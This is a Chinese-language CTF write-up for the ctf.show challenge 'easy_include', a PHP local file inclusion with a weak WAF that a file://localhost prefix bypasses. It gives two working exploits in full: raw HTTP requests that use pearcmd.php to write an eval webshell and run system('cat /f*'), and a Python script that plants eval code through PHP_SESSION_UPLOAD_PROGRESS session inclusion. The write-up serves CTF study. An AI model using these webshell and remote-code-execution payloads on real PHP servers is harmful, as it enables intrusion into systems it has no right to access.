# easy_include
题目:
<?php | |
function waf($path){ | |
$path = str_replace(".","",$path); | |
return preg_match("/^[a-z]+/",$path); | |
} | |
if(waf($_POST[1])){ | |
include "file://".$_POST[1]; | |
} |
题目设置了一个 waf 函数,利用 str_replace 函数去除 $path 中所有的点(.)。
然后使用 preg_match 函数检查修正后的路径是否以一个或多个小写字母开头,最后将文件包含仅限于使用 file 协议进行文件包含。
表面上看上去有限制,实际上由于 include "file://".$_POST [1];
可以说是毫无过滤点,唯一需要绕过的就是必须以小写字母开头,
可以利用 file://localhost 来绕过。
这里介绍两种解法:
1. 裸文件包含。
POST /?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST[%27cmd%27]);?>+/tmp/cmd.php HTTP/1.1 | |
Host: c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show | |
Origin: http://c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show | |
Cache-Control: max-age=0 | |
Upgrade-Insecure-Requests: 1 | |
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 | |
Accept-Encoding: gzip, deflate | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | |
Referer: http://c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show/ | |
Content-Length: 51 | |
1=localhost%2Fusr%2Flocal%2Flib%2Fphp%2Fpearcmd.php |
然后:
POST / HTTP/1.1 | |
Host: c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show | |
Origin: http://c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show | |
Cache-Control: max-age=0 | |
Upgrade-Insecure-Requests: 1 | |
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 | |
Accept-Encoding: gzip, deflate | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | |
Referer: http://c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show/ | |
Content-Length: 51 | |
1=localhost/tmp/cmd.php&cmd=system("cat /f*"); |
即可。
2.session 文件包含。
import requests | |
# Author:ctfshow-h1xa | |
url = "http://23509e94-3672-4f0e-8471-fd321235c9e0.challenge.ctf.show/" | |
data = { | |
'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[2]);?>', | |
'1':'localhost/tmp/sess_ctfshow', | |
'2':'system("ls /");' | |
} | |
file = { | |
'file': 'ctfshow' | |
} | |
cookies = { | |
'PHPSESSID': 'ctfshow' | |
} | |
response = requests.post(url=url,data=data,files=file,cookies=cookies) | |
print(response.text) |
简单粗暴。
关于这两中方法介绍可以查看我的这篇文章:
https://p1kap1.github.io/knowledge/ 文件包含 /
